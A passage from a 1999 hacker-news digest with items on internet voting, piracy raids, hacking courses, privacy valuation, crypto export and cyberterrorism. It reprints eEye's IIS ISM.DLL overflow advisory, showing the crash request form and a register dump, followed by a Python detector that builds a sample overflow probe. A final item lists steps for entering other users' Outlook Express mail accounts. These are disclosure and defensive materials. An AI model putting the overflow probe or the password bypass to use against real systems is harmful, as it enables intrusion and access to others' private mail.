- The lawsuit also states that Vencor officials spread rumors that Lenox Healthcare was on the verge of bankruptcy, threatened to take over the business and placed Clarke under "extreme duress."

- Vencor also is accused of undermining Lenox's efforts to obtain bank financing to offset losses created by Vencor's actions.

Lenox claims that the crux of the case involves its cooperation with federal investigators who were probing Vencor's alleged Medicare fraud schemes.

After the 1996 deal, Vencor retained contracts with Lenox Healthcare to provide certain rehabilitation services to the nursing home patients. Under the deal, Vencor would provide services such as physical and occupational therapies and then bill the nursing home for the services. The nursing home would bill Medicare and reimburse Vencor when payments were received.

According to the suit, Lenox Healthcare discovered that Vencor was "padding its bills" for rehabilitation services. Vencor, the lawsuit says, billed the nursing home for therapeutic services when staff members were actually engaged in marketing and administrative tasks. Other billing fraud was common as well, said the lawsuit.

Vencor claims Lenox Healthcare owes $9 million for "therapy services," but Lenox Healthcare believes it owes Vencor nothing, the lawsuit says.
The lawsuit claims that Vencor's actions against Lenox Healthcare were motivated "in part by [its] plummeting stock price, a federal investigation of Vencor's discrimination against and eviction of Medicaid patients, and securities fraud allegations."

The lawsuit accuses Vencor of carrying out a "vendetta" to seriously injure or financially ruin Lenox Healthcare.

According to financial reports, Vencor has been ordered by the federal government to repay $90 million in excessive Medicare reimbursements. The company also was exposed for trying to evict Medicaid patients from its nursing homes to replace them with more lucrative private-paying patients.

The lawsuit accuses Vencor of earning "a national reputation for erratic, abusive and vindictive conduct in the operation of its business activities."

Lenox Healthcare, a privately owned long-term care company, owns or operates some 100 nursing homes, hospitals and assisted-living facilities around the country.

@HWA

36.0 LA set to Allow Internet Voting
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

June 14th 1999

From HNN http://www.hackernews.com/

contributed by Anonymous

The Louisiana Republican Party may allow people to vote via computer in the Jan. 29, 2000, presidential caucus. The company VoteHere.Net says its system is one of the toughest to defeat. One has to wonder just how tough it would be to compromise the client side of the equation with programs like NetBus and Back Orifice floating around?

US News and World Report
http://www.usnews.com/usnews/issue/990621/internet.htm

@HWA

37.0 CCC Camp Shapes Up
~~~~~~~~~~~~~~~~~~~~~~

June 14th 1999

From HNN http://www.hackernews.com/

contributed by tim

The Chaos Communication Camp, scheduled to take place later this summer in Germany, is shaping up nicely. There is now a FAQ, registration information and even some weird video stuff.
Chaos Communication Camp
http://www.ccc.de/camp/
Camp Trailer
ftp://ftp.cs.tu-berlin.de/pub/NeXT/video/movies/quicktime/rendezvous_qt2.mov
HNN Cons Page
http://www.hackernews.com/cons/cons.html

@HWA

38.0 Hong Kong Makes Major Piracy Bust
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

June 14th 1999

From HNN http://www.hackernews.com/

contributed by Sinbad

Customs officials in Hong Kong have seized $2 million worth of pirated software, production equipment, and vehicles in what is being called the largest bust of its kind. Officials confiscated 180,000 pirated CDROM titles and arrested seven people.

Nando Times
http://www.techserver.com/story/body/0,1634,59240-94420-672929-0,00.html

Hong Kong Customs seize record number of pirated CD-ROMs

Copyright © 1999 Nando Media
Copyright © 1999 Associated Press

HONG KONG (June 13, 1999 9:53 a.m. EDT http://www.nandotimes.com) - Customs officials seized 180,000 illegal CD-ROMs along with production equipment in the latest raid to stop rampant copyright piracy, the government reported Sunday.

Officials seized the record number of computer CD-ROMS, a large quantity of equipment and four vehicles, worth a total of $2 million, during the raid Saturday, a statement from Customs said. Seven people were arrested, but no charges had been filed, it said.

Despite frequent raids, Hong Kong remains a center for copyright pirating. Pirated CDs, video CDs and computer software are widely available at shopping arcades and street vendors at a fraction of the cost of a genuine copy.

@HWA

39.0 Ernst & Young Profile
~~~~~~~~~~~~~~~~~~~~~~~~~~

June 14th 1999

From HNN http://www.hackernews.com/

contributed by afghan

A nice adverticle for Ernst & Young's Global Securities Solutions Center and its quick response team. Not much 'news' here but a real strong pitch for the 'eXtreme hacking' course offered by the company. It also mentions how great the Palm Pilot is.
Kansas City Star
http://www.kcstar.com/item/pages/business.pat,business/30db0e56.611,.html

Here is a link to PalmVNC, the VNC client that lets you drive a desktop running a VNC server (an X display or a Windows box) from a little ol' Palm Pilot, as mentioned in the above article. (Not everything is proprietary.)

PalmVNC
http://www.icsi.berkeley.edu/~minenko/PalmVNC

KC Star;

Hacker U: Company offers security service, training against computer invaders
By DAVID HAYES - The Kansas City Star
Date: 06/11/99 22:15

These aren't your father's accountants.

There isn't a button-down shirt among these Ernst & Young staffers. Not one of them is toting a calculator or adding machine. And that "generally accepted procedures" thing accounting firms like to talk about? Forget it.

In fact, these employees of the Big Five accounting firm get a little testy if you even ask whether they have an accounting background.

This is the Ernst & Young nerd squad. They aren't financial accountants looking for weaknesses in their clients' accounts-payable procedures. They're computer analysts looking for holes in their clients' computer security systems and ways to hack into their payroll.

It's big business. Ernst & Young has 30 employees in its Global Securities Solutions Center in Kansas City, new headquarters for a national and international computer security operation that has 700 employees worldwide. The operation expects to grow both here and worldwide and take in about $60 million in 1999 -- up from $12 million three years ago.

"We see this as being the wave of the future," said Lisa Schlosser, operations leader of eSecurity Solutions for Ernst & Young.

The program addresses computer security issues on several fronts -- training information technology employees for clients; examining corporate computer systems for potential holes; and moving in a "quick response team" if a hacker breaks into a client's computer system.
The service can be expensive -- $250,000 to more than $1 million, depending on the size of the client and the company's computer system, Schlosser said.

Even large corporations with well-protected computer systems are ripe for a digital break-in, said Eric Schultze, a member of the quick-response team and anti-hacking trainer for Ernst & Young.

One of the most critical computer break-ins Schultze said he had worked on involved a company that took security very seriously.

"They had all types of physical security to get into the building," Schultze said. "But somebody got in and controlled their computer systems. It had been going on for four to five days before they discovered it."

When that happens, Ernst & Young sends in its quick-response unit -- a team of three or more hacking experts, including some with law enforcement experience. The team has been called out three times in the last month.

As computers have become more prevalent in the workplace, the problem has grown.

"With any large corporation you can almost guarantee they've had a security breach somewhere," said George Kurtz, another member of the Ernst & Young team.

To reduce the chance of such attacks, Ernst & Young has set up a training program for its employees and for clients. This week, 30 Ernst & Young employees from around the country and from Canada, Great Britain and Denmark attended the computer hacking boot camp at the Kansas City center.

The weeklong program, called "eXtreme hacking -- Defending your site," is a $4,000 training course teaching "the greatest hacks out there today," Schultze said. And, of course, those who take the class are taught how to protect security systems from those computer break-ins.

"We show them things they never thought were possible," Schultze said.

Students in the class learn things like "account cracking," "exploiting reciprocal trust," "hijacking the GUI," and various ways to break into a computer system and find user passwords.
On Thursday, Ernst & Young trainers showed fellow employees how a hacker could hijack a client's computer -- even rebooting it remotely -- using a Palm Pilot personal organizer.

Ernst & Young has held about 10 classes around the country in the last year, mostly for the company's own employees. Similar classes now are planned at the Kansas City center about once a month, and the program is being opened to clients.

Instructors arrive packing a storeroom's worth of boxes with notebook computers, routers, networking equipment, servers and other computer gear. The classroom is set up to simulate various types of corporate computer systems.

Schultze said the classes grew out of a computer break-in at a big software company.

"We showed the company stuff that amazed them," he said. "They said, `You guys can do that? Can you teach us?' "

That's grown into a security practice that includes 23 laboratories across the country, all connected to a lab in Kansas City. The Kansas City lab includes every computer environment the company can think of, so that the latest hacking -- or anti-hacking -- tools can be tested before being deployed to other offices, Schlosser said.

The initial two-day course has become a weeklong anti-hacking event with a combination of classroom lectures and hands-on simulations that end with a hacker's version of a capture-the-flag contest.

Not just anyone with $4,000 will be able to take the class.

"Obviously, we do some screening," Schultze said. The class is for "white hat" hackers -- those who hack to find vulnerabilities in systems, not their "black hat" counterparts who hack to do damage.

The Ernst & Young computer security team uses both easily accessible hacking software tools and special programs developed by the company.

The team showed students how to hack into a corporate computer using a Palm Pilot and a program called PALM VNC.
Using the Palm Pilot's small screen, a hacker could see the hacked computer's desktop, and even when the cursor moved on the screen. "That was a pretty cool hack," said Royce Willis, from Ernst & Young's Chicago office. Kurtz showed the group another hijacking software program, called NetBus, that takes hacking a step further. Once a hacker breaks into a computer and installs NetBus, the program lets the hacker play sounds on the hacked computer, open the computer's CD-ROM drive or turn on a microphone attached to the computer to listen to what's being said in the room, he said. Schultze said VNC, NetBus and dozens of similar programs were created as administrative tools for computer systems administrators. "Any legitimate tool can be used for illegitimate purposes," Schultze said.

After taking more than three days of anti-hacking classes and learning that the instructors had secretly put a program on her laptop that logged every letter or number she'd typed, Jenny Dho, from Ernst & Young's Montreal office, said she'd learned a lot. "It worries me for my clients' sake," Dho said. Dave Morgan, who traveled from Ernst & Young's office in Vienna, Va., to take the class, said: "Keeping up with this stuff is a full-time job. "Every day, something new is released into the wild. Hackers are always one step ahead of us."

To reach David Hayes, technology writer, call (816) 234-4904 or send e-mail to dhayes@kcstar.com

All content © 1999 The Kansas City Star

@HWA

40.0 What is Your Privacy Worth?
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~

June 15th 1999

From HNN http://www.hackernews.com/

contributed by Anonymous

Do you know what value your privacy holds? The $2.3 billion marketing information industry sure does but how do you convince a court how much your privacy is worth if you need or want to sue a company for damages? The Electronic Frontier Foundation intends to find out.
They have started research into the problem of online identity value to make it easier for people to sue for damages. One factor in the equation will be how much companies charge for information, traditional use of a name for a direct mailing costs around seven cents, but on the Internet, each customer name is worth 15 cents. CAL LAW http://www.callaw.com/stories/edt0614f.html The Electronic Frontier Foundation http://www.eff.org/ CAL LAW; Putting a Price on Our Internet Identities By Renee Deger In more moribund moments, many life insurance policyholders have been known to joke bitterly about how much they'd be worth dead. Unfortunately, they have less of a clue of what they're worth alive, says one longtime plaintiffs lawyer. That's too bad, because marketing and retail companies are making a killing at dealing in the habits and preferences of living people -- information people often simply give away, knowingly or not. That cloud of ignorance is about to clear, and the average person may soon have a better idea of what they're worth as individuals. The San Francisco-based Internet think tank Electronic Frontier Foundation is embarking on an effort to put a price on the average person's identity so that people can sue for damages if their privacy is invaded -- especially their privacy as Web surfers. "An important part for an individual to negotiate with a Web site is the total cost of ownership [of themselves]," says Tara Lemmey, head of EFF. Still in its infancy, the effort to value individualism will be based in large part on how much money companies pay for customer information, and how much companies score for selling it. "How many times is [an individual profile of a] person selling, what's the value each time it's used, at what point does it decay -- that translates to what it's worth to a consumer," Lemmey says. The Internet has already turned the $2.3 billion marketing information industry on its ear. 
Traditional use of a name for a direct mailing is seven cents, but on the Internet, each customer name is worth 15 cents. Multiply that by millions of names being swapped millions of times. "Traditional list brokers jumped right in," says William Dean, president of San Francisco market researcher W.A. Dean & Associates. "Information on the Internet is worth more because people usually opt in" if they want to get more information or e-mails, Dean adds. Online information is so valuable that one start-up company earlier this year went so far as to offer free Compaq personal computers to anyone willing to be tracked. The computers doled out by FreePC, at www.freepc.com, are worth about $1,000 each, but the company is expected to recoup the money by selling the information it gleans from its "customers." Arnold Laub, a San Francisco plaintiffs attorney, is enticed by the prospects. "It's something that hasn't really been analyzed. If it's done right and the economists get involved, you can make a determination of interest and value," Laub says. "The problem is -- most people don't know the value of their identity," he says. Other factors of a human life have already been probed in detail, however. In personal injury and wrongful death claims, lawyers already can refer to actuarial tables and economic formulas to value lost livelihood. And in claims involving famous people who have already sold their likeness or their creations, lawyers can refer to prior contract terms. Whether the EFF's effort produces the same kinds of wallet-card-type dollar values on death and lost wages that plaintiffs lawyers utilize is still up in the air, however. Lemmey says the foundation's in-house lawyers have just begun to kick around the idea and are hoping to come up with a model to support broader debates. She says they want people to become more conscious of the value they add to commercial enterprises, and how much they can demand from a company that doesn't keep its promises. 
"If a company claims it's for one-time use or internal purposes only or sells it, what are the damages?" asks Lemmey. "No one knows."

@HWA

41.0 BSA Tactics Condemned by UK
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

June 15th 1999

From HNN http://www.hackernews.com/

contributed by Warez Dude

The Birmingham Chamber of Commerce and Industry, and the Advertising Standards Authority in England have condemned the practices of the Business Software Alliance. The two groups claim that recent tactics used by the BSA in its 'Crackdown 99' campaign are misleading and overly threatening.

Wired http://www.wired.com/news/news/politics/story/20217.htm (url unavailable June 24th - Ed)

@HWA

42.0 US Allows 128bit SSL Into Japan
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

June 15th 1999

From HNN http://www.hackernews.com/

contributed by secret

Recent changes in the crypto export law have left open a small loophole that allows 128-bit SSL encryption out of the country. The recent export deregulation covered "online merchants," or electronic shops; if a user goes directly to VeriSign in the United States, it is possible to obtain a digital ID for 128-bit encryption at electronic shops in Japan.

Asia Biz Tech http://www.nikkeibp.asiabiztech.com/wcs/leaf?CID=onair/asabt/moren/73414

U.S. Export Loophole Allows 128-bit SSL Encryption to Be Used by Japanese Electronics Shops

June 10, 1999 (TOKYO) -- A loophole in U.S. export restrictions of 128-bit Secure Sockets Layer encryption is allowing Japanese electronics shops to adopt the stringent security method. It was found that the digital ID for the server that enables 128-bit encryption can be easily obtained by electronic shops.

SSL is a mechanism of encrypted communications between Web browsers and servers. In Japan, 40-bit SSL encryption is normally used. The 128-bit SSL encryption is far more secure: its key space is 2^88, roughly 3 x 10^26, times larger than that of 40-bit SSL.

Due to export restrictions imposed by the United States, the use of 128-bit encryption in Japan was not permitted until December 1998, when the United States partially deregulated 128-bit encryption exports and allowed their use in financial institutions and the health care industry.

Responding to this export deregulation of the U.S. government, VeriSign Inc. of the United States began to offer the service to provide Digital Authentication IDs for 128-bit SSL encryption for overseas countries, including Japan. The service is offered through www.verisign.com and became available in Japan in April 1999. The recent export deregulation covered "online merchants," or electronic shops, but VeriSign Japan KK did not intend to provide such general shops with digital IDs for 128-bit encryption because of safety considerations. It was found, however, that if a user goes directly to VeriSign in the United States, it is possible to obtain a digital ID for 128-bit encryption at electronic shops in Japan. Therefore, a highly secure SSL can be used in Japan as well as in the United States, unless these electronic shops sell drugs and materials considered to be used as weapons. (Nikkei Multimedia)

@HWA

43.0 Terrorist About to Cause Electronic Chaos
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

June 15th 1999

From HNN http://www.hackernews.com/

contributed by Weld Pond

Massive FUD (Fear, Uncertainty, and Doubt) in this article. We might as well just give up because the world will end tomorrow. Terrorists roaming the internet about to cause massive chaos around the globe. The threat of electronic terrorism is looming larger and larger each day.

The Jerusalem Post
Monday, June 14, 1999 30 Sivan 5759
Updated Mon., Jun. 14 08:52

Computer terror can't be ignored
By YONAH ALEXANDER

(June 14) - The latest "Melissa" virus, which spreads via infected e-mail, and the upsurge of computer intrusion by hackers into the Web sites of the White House, Senate, and the FBI, have once again focused attention on cyber-crime and its ominous international security implications.
It should be recalled that in February 1998, Ehud Tenenbaum, an Israeli hacker also known as "The Analyzer," worked with two young collaborators from California to mount cyber-attacks against the Pentagon's systems, a nuclear weapons research lab and other significant targets. The prevailing assessment of intelligence agencies, strategic thinkers, and scientists is that not only hackers and "crackers" (criminal hackers) but also terrorists - individuals, groups, and state sponsors - are likely to exploit the vulnerability of the world's computer systems to conduct electronic warfare. It is estimated, for instance, that hostile perpetrators, with a budget of around $10 million and a team of some 30 computer experts strategically placed around the globe, could bring the US to its knees. The threat of electronic terrorist assaults grows with each passing day. There are three reasons for this: * The globalization of the Internet. Internet users currently number over 120 million; an estimated 1 billion people will be using it by the year 2005. This makes efforts to control Internet attacks a daunting challenge to intelligence services and law-enforcement agencies. * There are now some 30,000 hacker-oriented sites on the Internet, making the tools of disruption and destruction available to almost anyone. The easily available recipes for these new weapons - worms, Trojan horses, and logic bombs, among others - are making this form of warfare a permanent fixture of international life. * With the Cold War now behind us, terrorist organizations have cast off the limitations and ideologies of the formerly bipolar world and have become multidirectional. These new political realities, coupled with easily accessible cyber-weapons, have enhanced the threats posed by terror groups to the degree that they could alter life on our planet forever. The Internet already serves as an arena for propaganda and psychological warfare. 
Ideological extremists such as neo-Nazi groups have called for ethnic, racial, and religious violence. Traditional terrorist organizations like Hizbullah, which is supported by Iran and Syria, maintain on their Web sites a daily record of "heroic" battles of their fighters in southern Lebanon. And Afghanistan, the newest state sponsor of terrorism, pushes its radical brand of Islam on-line. Terrorists have also used their laptops to store operation plans. Ramzi Ahmed Yusuf, who is serving a life sentence for the 1993 World Trade Center bombing in New York and other terrorist crimes, used his computer to develop a plot to blow up some dozen American airliners over the Pacific. And terror networks, such as the underground infrastructure of Osama bin Laden, who has been implicated in the US embassy bombings in Kenya and Tanzania last summer, are sustained via personal computers with satellite uplinks and encrypted messages.

Is the worst yet to come? Consider waking one morning to the news that a group of terrorists employing electronic "sniffers" have sabotaged the global financial system by disrupting international fund-transfer networks, causing an unprecedented stocks plunge on the New York, London, and Tokyo exchanges. Clearly, there are numerous other devastating scenarios, including altering formulas for medication at pharmaceutical plants; "crashing" telephone systems; misrouting passenger trains; changing pressure in gas pipelines to cause valve failure; disrupting operations of air-traffic control towers; triggering oil refinery explosions and fires; scrambling the software used by emergency services; turning off power grids; and simultaneously detonating hundreds of computerized bombs around the world. In sum, this new medium of communication, command and control, supplemented by the repeated destructive keyboard attacks on civilian and military nerve centers that we have already seen, forces us to think the unthinkable - and take action to prevent it.
If the expanding electronic perils are ignored by the international community, it is likely that the 21st century could produce a global Waterloo for civilization.

(The writer is a professor and the director of the Inter-University Center for Terrorism Studies - Israel and the United States.)

@HWA

44.0 Major Remote Hole Found in IIS
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

June 16th 1999

From HNN http://www.hackernews.com/

contributed by Marc

eEye Digital Security Team has found a major remotely exploitable hole in Microsoft's Internet Information Server. The buffer overflow in ISM.DLL leaves approximately 90% of 1.3 million Microsoft web servers vulnerable to internet attack. The folks at eEye have graciously developed an exploit script to demonstrate this hole. Microsoft has provided a work around and is working on a patch.

eEye Digital Security Team http://www.eeye.com/database/advisories/ad06081999/ad06081999.html
Wired http://www.wired.com/news/news/technology/story/20231.html
Microsoft http://www.microsoft.com/security/bulletins/ms99-019.asp

eEye; Retina vs. IIS4, Round 2

Systems Affected:
 Internet Information Server 4.0 (IIS4)
 Microsoft Windows NT 4.0 SP3 Option Pack 4
 Microsoft Windows NT 4.0 SP4 Option Pack 4
 Microsoft Windows NT 4.0 SP5 Option Pack 4

Release Date: June 8, 1999
Advisory Code: AD06081999

Description:
We have been debating how to start out this advisory. How do you explain that 90% or so of the Windows NT web servers on the Internet are open to a hole that lets an attacker execute arbitrary code on the remote web server? So the story starts...

The Goal:
Find a buffer overflow that will affect 90% of the Windows NT web servers on the Internet. Exploit this buffer overflow.

The Theory:
There will be overflows in at least one of the default IIS filtered extensions (i.e. .ASP, .IDC, .HTR). The way we think the exploit will take place is that IIS will pass the full URL to the DLL that handles the extension.
Therefore if the ISAPI DLL does not do proper bounds checking it will overflow a buffer taking IIS (inetinfo.exe) with it and allow us to execute arbitrary code on the remote server.

Entrance Retina:
At the same time of working on this advisory we have been working on the AI mining logic for Retina's HTTP module. What better test scenario than this? We gave Retina a list of 10 or so extensions common to IIS and instructed it to find any possible holes relating to these extensions.

The Grind:
After about an hour Retina found what appeared to be a hole. It displayed that after sending "GET /[overflow].htr HTTP/1.0" it had crashed the server. We all crossed our fingers, started up the good ol' debugger and had Retina hit the server again.

Note: [overflow] is 3k or so characters... but we will not get into the string lengths and such here. View the debug info and have a look for yourself.

The Registers:
 EAX = 00F7FCC8
 EBX = 00F41130
 ECX = 41414141
 EDX = 77F9485A
 ESI = 00F7FCC0
 EDI = 00F7FCC0
 EIP = 41414141
 ESP = 00F4106C
 EBP = 00F4108C
 EFL = 00000246

Note: Retina was using "A" (0x41 in hex) for the character to overflow with. If you're not familiar with buffer overflows a quick note would be that getting our bytes into any of the registers is a good sign, and directly into EIP makes it even easier :)

Explain This:
The overflow is in relation to the .HTR extensions. IIS includes the capability to allow Windows NT users to change their password via the web directory /iisadmpwd/. This feature is implemented as a set of .HTR files and the ISAPI extension file ISM.DLL. So somewhere along the line when the URL is passed through to ISM.DLL, proper bounds checking is not done and our overflow takes place. The .HTR/ISM.DLL ISAPI filter is installed by default on IIS4 servers. Looks like we got our 90% of the Windows NT web servers part down. However can we exploit this?

The Exploit:
Yes. We can definitely exploit this and we have.
We will not go into much detail here about how the buffer is exploited and such. However, one nice thing to note is that the exploit has been crafted in such a way to work on SP4 and SP5 machines, therefore there is no guessing of offsets and possible accidental crashing of the remote server. Click here for more details about the exploit and the code.

The Fallout:
Almost 90% of the Windows NT web servers on the Internet are affected by this hole. Even a server that's locked in a guarded room behind a Cisco Pix can be broken into with this hole. This is a reminder to all software vendors that testing for common security holes in your software is a must. Demand more from your software vendors.

The Request. (Well one anyway.)
Dear Microsoft,
One of the things that we found out is that IIS did not log any trace of our attempted hack. We recommend that you pass all server requests to the logging service before passing it to any ISAPI filters etc... The logging service should be, as named, an actual service running in a separate memory space so that when inetinfo goes down intrusion signatures are still logged.

Retina vs. IIS4, Round 2. KO.

Fixes:
 1. Remove the extension .HTR from the ISAPI DLL list. Microsoft has just updated their checklist to include this interim fix.
 2. Apply the patch supplied by Microsoft when available.

Vendor Status:
We contacted Microsoft on June 8th 1999. eEye Digital Security Team provided all information needed to reproduce the exploit and how to fix it. Microsoft security team did confirm the exploit and are releasing a patch for IIS.

Related Links
Retina - The Network Security Scanner http://www.eEye.com/retina/
Retina - Brain File used to uncover the hole http://www.eEye.com/database/advisories/ad06081999/ad06081999-brain.html
Exploit - How we did it and the code.
http://www.eEye.com/database/advisories/ad06081999/ad06081999-exploit.html NetCat - TCP/IP "Swiss Army knife" http://www.l0pht.com/~weld/netcat/ Greetings go out to: The former Secure Networks Inc., L0pht, Phrack, ADM, Rhino9, Attrition, HNN and any other security company or organization that believes in full disclosure. Copyright (c) 1999 eEye Digital Security Team Permission is hereby granted for the redistribution of this alert electronically. It is not to be edited in any way without express consent of eEye. If you wish to reprint the whole or any part of this alert in any other medium excluding electronic medium, please e-mail alert@eEye.com for permission. Disclaimer: The information within this paper may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties with regard to this information. In no event shall the author be liable for any damages whatsoever arising out of or in connection with the use or spread of this information. Any use of this information is at the user's own risk. Please send suggestions, updates, and comments to: eEye Digital Security Team info@eEye.com www.eEye.com -=- Wired; E-Commerce Sites: Open Sesame? by Niall McKay 11:40 a.m. 15.Jun.99.PDT A major security flaw in a Microsoft Web server could allow crackers to take complete control of e-commerce Web sites, security experts warned Tuesday. The flaw in Microsoft's Internet Information Server 4.0 allows unauthorized remote users to gain system-level access to the server, according to Firas Bushnaq, CEO of eEye, the Internet security firm that discovered it. "This hole is so serious it's scary," said Jim Blake, a network administrator for Irvine, a city in southern California. "With other [Windows NT] security holes, crackers have needed to gain some level of user access before executing code on the server. This is different.... Anybody off the Web can crack IIS," he said. 
More than 1.3 million Microsoft IIS servers are up and running on the Web. Nasdaq, Walt Disney, and Compaq are among the larger e-commerce operations run off the server, according to NetCraft Internet surveys. Microsoft confirmed that the problem exists and said that it is working on a fix. Customers, however, have not been notified. "Normally we will post the problem and the bug fix at the same time," said Microsoft spokeswoman Jennifer Todd. "We take these security issues very seriously, and the patch will be available [soon]." The fix will be posted to Microsoft's security Web site, "probably in the next couple of days," Todd said. The exploit is just one of a long list of security flaws affecting IIS 4.0. In May, security experts found an exploit that enabled crackers to gain read access to files held on IIS when they requested certain text files. Last summer, an exploit known as the $DATA Bug granted any non-technical Web users access to sensitive information within the source code used in Microsoft's Active Server Page, which is used on IIS. And in January, a similar IIS security hole was discovered, one that exposed the source code and certain system settings of files on Windows NT-based Web servers. But the latest problem appears to be the most serious because of the level of access it reportedly allows. "The exploit gives crackers access to any database or software residing on the Web server machine," said Bushnaq. "So they could steal credit-card information or even post counterfeit Web pages." For instance, crackers could exploit the bug to modify stock prices at one of the many news and stock information sites running IIS. The hole allows remote users to gain control of an IIS 4.0 server by creating what is known as a "buffer overflow" on .htr Web pages -- an IIS feature designed to enable users to remotely change their passwords. A buffer overflow can occur when a system is fed a value much larger than expected. 
In the case of the bug, the Dynamic Link Library (DLL) governing the .htr file extension, called ISM.DLL, can be overloaded by running a utility that loads too many characters into the library. Once overloaded, the DLL is disabled and the content of the overflow "bleeds" into the system. "Normally, this would just crash the system," said Space Rogue, a member of L0pht Heavy Industries, an independent security consulting firm that last year testified before the United States Senate on government information security. "But a good cracker can write an exploit where the data that overflows will actually be an executable program that will run as machine code," said Space Rogue. Such a move could give a cracker complete control of the target system. The overflow executable program can be used to run a system-level program that will deliver the equivalent of a DOS command window to an attacker's PC.

To demonstrate the hole, eEye wrote a program called IIS Hack that will enable users to crack and execute code on any IIS 4.0 Web Server. However, disabling or removing the .htr password utility will not fix the problem, according to Bushnaq. "You have got to go through a series of steps to remove the faulty [code]." Eeye discovered the problem while beta testing a network security auditing tool. "Remote exploits are about the most serious problems you can have with a Web server," said Space Rogue. "It gives the attacker root privileges, so the cracker not only has access to the IIS server but [to] software running on that machine." "In many corporate sites today, this will give the cracker access to the entire network." Eeye is a software development firm specializing in security audit tools. Chief executive Bushnaq previously founded the electronic commerce site ECompany.com.
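Two practical points fall out of the eEye advisory above: the attack is a single request of the form GET /[overflow].htr carrying a few thousand bytes of one fill character, and IIS logged nothing because inetinfo.exe was dead before its logging code ran. Both argue for screening requests somewhere other than IIS itself (a front-end proxy, a sniffer, a packet log review). The following is an added example written for this digest; it is not eEye's exploit, Retina's brain file, or Microsoft's workaround. It scores raw HTTP request lines for the .htr/ISM.DLL pattern and reads a register dump like the one printed in the advisory to report which registers are entirely the fill byte, which is the "our bytes in EIP" sign eEye points at. The 1024-byte path threshold and the sample request lines are assumptions constructed for the example; eEye only says the crashing URL was "3k or so" characters.

```python
import re
from collections import Counter
from urllib.parse import urlsplit

# Path-length threshold is an assumption for this example: the advisory says the
# crashing URL was "3k or so" characters, and nothing under /iisadmpwd/ needs
# anywhere near a kilobyte of path.
MAX_HTR_PATH = 1024

REQUEST_LINE = re.compile(r"^(?P<method>[A-Z]+)\s+(?P<target>\S+)\s+HTTP/(?P<ver>\d\.\d)\s*$")
REGISTER = re.compile(r"\b(E[A-D]X|E[SD]I|E[BS]P|EIP|EFL)\s*=\s*([0-9A-Fa-f]{8})")


def parse_request_line(line):
    """Split an HTTP/1.x request line; return None if the line is not one."""
    m = REQUEST_LINE.match(line.strip())
    if m is None:
        return None
    target = m.group("target")
    return {"method": m.group("method"), "target": target, "path": urlsplit(target).path}


def classify_htr_request(line, max_path=MAX_HTR_PATH):
    """Return triage data if the request line looks like an ISM.DLL overflow probe, else None.

    A hit means the path is routed to the .HTR ISAPI mapping and is longer than
    max_path bytes.  The dominant character and its share of the path are
    reported because an overflow buffer is mostly one fill byte.
    """
    req = parse_request_line(line)
    if req is None:
        return None
    path = req["path"]
    if not path.lower().endswith(".htr") or len(path) <= max_path:
        return None
    fill_char, count = Counter(path).most_common(1)[0]
    return {
        "method": req["method"],
        "path_len": len(path),
        "fill_char": fill_char,
        "fill_share": round(count / len(path), 2),
    }


def scan_request_lines(lines, max_path=MAX_HTR_PATH):
    """Apply classify_htr_request to every line; return (line_no, verdict) for hits."""
    hits = []
    for n, line in enumerate(lines, start=1):
        verdict = classify_htr_request(line, max_path)
        if verdict is not None:
            hits.append((n, verdict))
    return hits


def attacker_controlled_registers(dump, fill=0x41):
    """Names of registers in a debugger dump whose four bytes are all the fill byte."""
    controlled = []
    for name, hexval in REGISTER.findall(dump):
        raw = bytes.fromhex(hexval)
        if len(set(raw)) == 1 and raw[0] == fill:
            controlled.append(name)
    return controlled


# Register dump exactly as printed in the eEye advisory.
EEYE_REGISTERS = (
    "EAX = 00F7FCC8 EBX = 00F41130 ECX = 41414141 EDX = 77F9485A "
    "ESI = 00F7FCC0 EDI = 00F7FCC0 EIP = 41414141 ESP = 00F4106C "
    "EBP = 00F4108C EFL = 00000246"
)

# Constructed sample request lines (not captured traffic): a short .htr page
# under /iisadmpwd/, an overlong request to a different handler, and an
# eEye-style .htr probe filled with "A".
SAMPLE_REQUEST_LINES = [
    "GET /iisadmpwd/x.htr HTTP/1.0",
    "GET /" + "A" * 3000 + ".asp HTTP/1.0",
    "GET /" + "A" * 3000 + ".htr HTTP/1.0",
]

if __name__ == "__main__":
    for n, verdict in scan_request_lines(SAMPLE_REQUEST_LINES):
        print(f"line {n}: suspicious .htr request {verdict}")
    print("attacker-controlled registers:", attacker_controlled_registers(EEYE_REGISTERS))
```

Only the third sample line is flagged: the first is a normal-length .htr path and the second is long but never reaches ISM.DLL. Running the check in front of the server rather than inside it is the point eEye makes in its request to Microsoft: a record of the request has to exist before the process that would have logged it is overwritten.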
-=-

@HWA

45.0 Outlook Express 4.5 Email Bug
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

June 16th 1999

From HNN http://www.hackernews.com/

contributed by deepquest

Maccentral.com is reporting on a bug in Outlook Express 4.5. Basically what it comes down to is if your machine has more than one email account, and you know the password for one account, then you can gain access to all the accounts. Pretty damaging hole for multi-user machines.

MacCentral Online http://www.maccentral.com/news/9906/15.sonata.shtml

Email encryption problems should be solved in Sonata
by Dennis Sellers, dsellers@maccentral.com
June 15, 1999, 9:45 am ET

If you're using a free Mac email application, you inherently have a lack of secure encryption as Andrew Jung, a computer science student at Camosun College (Victoria BC, Canada), recently discovered. Jung was using Outlook Express 4.5 on the family iMac when he came upon what he described as a "disturbing bug." Jung attempted to use the "Change Current User" menu item of Outlook Express to access his personal email account (three separate email accounts were on the family Mac) when he realized he'd forgotten his password. He clicked "Cancel" and was returned to the account selection dialog. "I selected my step father's account, typed in his password, and got a message saying that his password was incorrect," Jung says. "I try again and again. No go. Then for the heck of it I looked up my password for my account, tried it, and got it. I did the procedure again over and over, and I can reproduce it every time. Whatever account I click and then cancel, that is the password for all the accounts."

The situation can be reproduced this way:

 - Open Outlook Express and at the user account dialog select "New User." In the settings type in any password you want.
 - Select change user from File.
 - Select the newly created account, then click "OK."
 - Click cancel at the password prompt.
 - Select the user's account you would like to break into, and click "OK."
 - Type in YOUR password for the new account and you're in.

DON'T try this at work or to access anyone's email account without permission. This was for "demonstration purposes" only.

